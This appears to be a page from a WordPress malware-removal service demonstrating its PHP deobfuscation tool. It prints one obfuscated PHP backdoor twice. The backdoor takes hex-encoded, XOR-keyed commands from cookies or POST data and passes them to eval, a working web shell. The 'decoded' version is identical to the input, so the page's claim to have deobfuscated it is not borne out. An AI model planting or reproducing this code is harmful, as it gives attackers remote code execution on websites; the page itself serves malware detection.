Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function XFJeRGxVE() { $mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS"); $EtXmTWcr = array( /* KLU */ "YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl", ); $FJXluMnz = array( $mSMUb, /*X*/ $_COOKIE, $mSMUb, $_POST, $EtXmTWcr, ); return $FJXluMnz; } /* jDAl */ /* eaK */ functi...



Obfuscated php code

<?php

function XFJeRGxVE()
{
    $mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS");
    $EtXmTWcr = array(
        /*  KLU */
        "YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl",
    );
    $FJXluMnz = array(
        $mSMUb,
        /*X*/
        $_COOKIE,
        $mSMUb,
        $_POST,
        $EtXmTWcr,
    );
    return $FJXluMnz;
}
/*   jDAl */
/*  eaK   */
function zTzMeKho()
{
    /* y*/
    $MgwdxhxJP = "#";
    foreach (XFJeRGxVE() as $rSLxx) {
        /*CYZ  */
        JNUOvHulpB($rSLxx, $MgwdxhxJP);
    }
}
/* n*/
function pcPxwCl($MXqqSrydnJ, $mSMUb)
{
    if (count($MXqqSrydnJ) == 3) {
        /* CV  */
        $EhkekvIFY = $MXqqSrydnJ[1];
        $zPAeHhF = $MXqqSrydnJ[2];
        $_Y = '32594';
        $abuOVnHuP = $EhkekvIFY($zPAeHhF);
        $_jk = '1592';
        /*   o*/
        eval($abuOVnHuP);
        die;
    }
    /*   WfmW   */
}
/*m */
/*  cuG */
function fWwrFxNS($suZrMbV, $rAzzJRZm)
{
    return $suZrMbV ^ $rAzzJRZm;
}
/*   ad*/
/*   pGr */
function LPKdrL($vWZXzeXjGN, $MgwdxhxJP)
{
    /*   ioHq*/
    /*F */
    $vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN);
    pcPxwCl($vWZXzeXjGN, $MgwdxhxJP);
    $_pV = '17799';
}
function JNUOvHulpB($rSLxx, $MgwdxhxJP)
{
    /* TCPwP */
    foreach ($rSLxx as $rAzzJRZm => $suZrMbV) {
        /* lv */
        uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP);
        $_yrm = '51682';
        /* Cfi */
    }
    /*y   */
}
function SGfJjEqALa($rAzzJRZm, $suZrMbV)
{
    $JHaAl = strlen(
        /* Hn */
        $suZrMbV
    ) / strlen(
        /* xae*/
        $rAzzJRZm
    );
    $_QzJ = '13180';
    $rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo";
    $rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1);
    return $rAzzJRZm;
}
/* DaxAV*/
function yfPHNUygM($suZrMbV)
{
    return @pack(
        /*   wTvy  */
        'H*',
        /*UlLW  */
        $suZrMbV
    );
}
function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP)
{
    /*   QEOHo   */
    /* m   */
    LPKdrL($suZrMbV ^ SGfJjEqALa(
        $rAzzJRZm,
        /*xdNwC   */
        $suZrMbV
    ), $MgwdxhxJP);
}
/*  PGz  */
/*  D*/
zTzMeKho();

Decoded(de-Obfuscated) php code

<?php

function XFJeRGxVE()
{
    $mSMUb = array("qhFguTrvUDLeYYalvINQOsTlhKI" => "tFutPVGbS");
    $EtXmTWcr = array(
        /*  KLU */
        "YwNcYGRMP" => "yDvNwjaPUOMaRRqSvtDTTJPCqZtIl",
    );
    $FJXluMnz = array(
        $mSMUb,
        /*X*/
        $_COOKIE,
        $mSMUb,
        $_POST,
        $EtXmTWcr,
    );
    return $FJXluMnz;
}
/*   jDAl */
/*  eaK   */
function zTzMeKho()
{
    /* y*/
    $MgwdxhxJP = "#";
    foreach (XFJeRGxVE() as $rSLxx) {
        /*CYZ  */
        JNUOvHulpB($rSLxx, $MgwdxhxJP);
    }
}
/* n*/
function pcPxwCl($MXqqSrydnJ, $mSMUb)
{
    if (count($MXqqSrydnJ) == 3) {
        /* CV  */
        $EhkekvIFY = $MXqqSrydnJ[1];
        $zPAeHhF = $MXqqSrydnJ[2];
        $_Y = '32594';
        $abuOVnHuP = $EhkekvIFY($zPAeHhF);
        $_jk = '1592';
        /*   o*/
        eval($abuOVnHuP);
        die;
    }
    /*   WfmW   */
}
/*m */
/*  cuG */
function fWwrFxNS($suZrMbV, $rAzzJRZm)
{
    return $suZrMbV ^ $rAzzJRZm;
}
/*   ad*/
/*   pGr */
function LPKdrL($vWZXzeXjGN, $MgwdxhxJP)
{
    /*   ioHq*/
    /*F */
    $vWZXzeXjGN = explode($MgwdxhxJP, $vWZXzeXjGN);
    pcPxwCl($vWZXzeXjGN, $MgwdxhxJP);
    $_pV = '17799';
}
function JNUOvHulpB($rSLxx, $MgwdxhxJP)
{
    /* TCPwP */
    foreach ($rSLxx as $rAzzJRZm => $suZrMbV) {
        /* lv */
        uZFNVq($rAzzJRZm, yfPHNUygM($suZrMbV), $MgwdxhxJP);
        $_yrm = '51682';
        /* Cfi */
    }
    /*y   */
}
function SGfJjEqALa($rAzzJRZm, $suZrMbV)
{
    $JHaAl = strlen(
        /* Hn */
        $suZrMbV
    ) / strlen(
        /* xae*/
        $rAzzJRZm
    );
    $_QzJ = '13180';
    $rAzzJRZm .= "Htr-uVlItIy-gEmwy-NMpOeF-ZDVNJU-EbGMVuh-HxGKOo";
    $rAzzJRZm = str_repeat($rAzzJRZm, $JHaAl + 1);
    return $rAzzJRZm;
}
/* DaxAV*/
function yfPHNUygM($suZrMbV)
{
    return @pack(
        /*   wTvy  */
        'H*',
        /*UlLW  */
        $suZrMbV
    );
}
function uZFNVq($rAzzJRZm, $suZrMbV, $MgwdxhxJP)
{
    /*   QEOHo   */
    /* m   */
    LPKdrL($suZrMbV ^ SGfJjEqALa(
        $rAzzJRZm,
        /*xdNwC   */
        $suZrMbV
    ), $MgwdxhxJP);
}
/*  PGz  */
/*  D*/
zTzMeKho();


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.